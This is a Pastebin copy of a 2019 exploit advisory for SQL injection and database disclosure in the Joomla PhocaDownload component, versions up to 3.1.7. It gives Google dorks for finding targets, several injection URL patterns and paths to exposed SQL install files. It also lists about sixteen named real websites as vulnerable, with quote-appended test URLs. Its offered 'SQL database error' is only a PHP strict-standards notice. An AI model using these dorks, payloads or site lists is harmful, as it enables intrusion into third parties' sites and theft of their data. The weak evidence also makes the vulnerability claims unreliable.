Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla PhocaDownload Components 3.1.7 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 04/02/2019
- # Vendor Homepage : phoca.cz
- # Software Download Links : phoca.cz/download/category/4-phoca-download-component
- github.com/PhocaCz/PhocaDownload/releases/download/3.1.7/com_phocadownload_v3.1.7.zip
- github.com/PhocaCz/PhocaDownload/releases/download/2.1.9/com_phocadownload_v2.1.9.zip
- github.com/PhocaCz/PhocaDownload/releases/download/1.3.9/com_phocadownload_v1.3.9.zip
- # Software Information Link : extensions.joomla.org/extension/phoca-download/
- # Software Versions : 1.3.9, 2.1.9, 3.1.5, 3.1.7
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_phocadownload''
- intext:Powered by Phoca Download
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Phoca Download is download manager for Joomla! CMS. It includes
- component, modules and plugins and allows displaying files on website
- which can be downloaded (previewed, played) by website visitiors.
- Downloaded files are listed in Statistics View (administration).
- ####################################################################
- # Impact :
- ***********
- Joomla PhocaDownload 3.1.7 component for Joomla and other previous versions
- is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
- user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_phocadownload&view=category&id=[SQL Injection]
- /index.php?option=com_phocadownload&view=category&download=[SQL Injection]
- /index.php?option=com_phocadownload&view=categories&Itemid=[SQL Injection]
- /index.php?option=com_phocadownload&view=sections&Itemid=[SQL Injection]
- /index.php?option=com_phocadownload&view=category&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_phocadownload&view=category&id=[ID-NUMBER]:[FOLDER-NAME]&Itemid=[SQL Injection]
- /index.php?option=com_phocadownload&view=category&id=[ID-NUMBER]::[FOLDER-NAME]&download=[ID-NUMBER]::[FOLDER-NAME]&[ID-NUMBER]&start=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_phocadownload&view=category&download=[ID-NUMBER]:[FOLDER-NAME]&id=[ID-NUMBER]:[FOLDER-NAME]&Itemid=[SQL Injection]
- # Database Disclosure Exploit :
- ****************************
- /administrator/components/com_phocadownload/install/sql/mysql/.......
- /administrator/components/com_phocadownload/install.sql
- /administrator/components/com_phocadownload/uninstall.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] traumhaftes-wandermaerchen.de/index.php?option=
- com_phocadownload&view=category&download=
- 7:oberlinspher-weg&id=1:gps-tracks&Itemid=12%27
- [+] medic.usm.my/kkkk/index.php?option=
- com_phocadownload&view=category&download=
- 1:borang-tempahan-pinjaman-perabot-pokok-hiasan
- &id=1:forms&Itemid=257%27
- [+] paroki-blokb.org/index.php?option=
- com_phocadownload&view=
- category&id=4:formulir-lain-lain&Itemid=155%27
- [+] emanuelecardi.it/WEB/index.php?option=
- com_phocadownload&view=categories&Itemid=147%27
- [+] skisiklos.hu/index.php?option=
- com_phocadownload&view=category&id=13
- [+] dch.hu/hu/?option=
- com_phocadownload&view=category&id=1:rlistk&Itemid=1%27
- [+] onfartigianatocalabria.it/index.php?option=
- com_phocadownload&view=category&id=3&Itemid=117%27
- [+] seport.com.br/index.php?option=
- com_phocadownload&view=category&id=2:resolues
- &download=43:resoluo-n-11&start=20&Itemid=37%27
- [+] anticapievediverdeto.it/joomla/index.php?option=
- com_phocadownload&view=sections&Itemid=72%27
- [+] ampelos.org/ampelos.org/index.php?option=
- com_phocadownload&view=category&id=
- 1%3Adocumenti-generici&download=
- 8%3Araccolta-tappi-bra&Itemid=55%27
- [+] ftdlotgenoten.nl/site/index.php?option=
- com_phocadownload&view=category&download=
- 4:ftd-nieuwsflits-5&id=1%27
- [+] polechatenay.lifb.org/index.php?option=
- com_phocadownload&view=category&id=1:interclubs
- &download=1893:lifb1819crireglementv1a03sanctions&Itemid=26%27
- [+] vestex.com.gt/old/index.php?option=
- com_phocadownload&view=category&id=
- 17:rse&Itemid=250%27
- [+] zcdt.org.zw/index.php?option=
- com_phocadownload&view=category&download=
- 2:weekly-exercise&id=1:downloads&Itemid=23%27
- [+] zcdt.org.zw/administrator/components
- /com_phocadownload/uninstall.sql
- [+] ipesp.ac.th/web-stu/index.php?option=
- com_phocadownload&view=category&download=
- 10:7&id=1%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Only variables should be assigned by reference in
- /home/eijpju/public_html/components/com_phocadownload
- /views/category/view.html.php on line 29
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment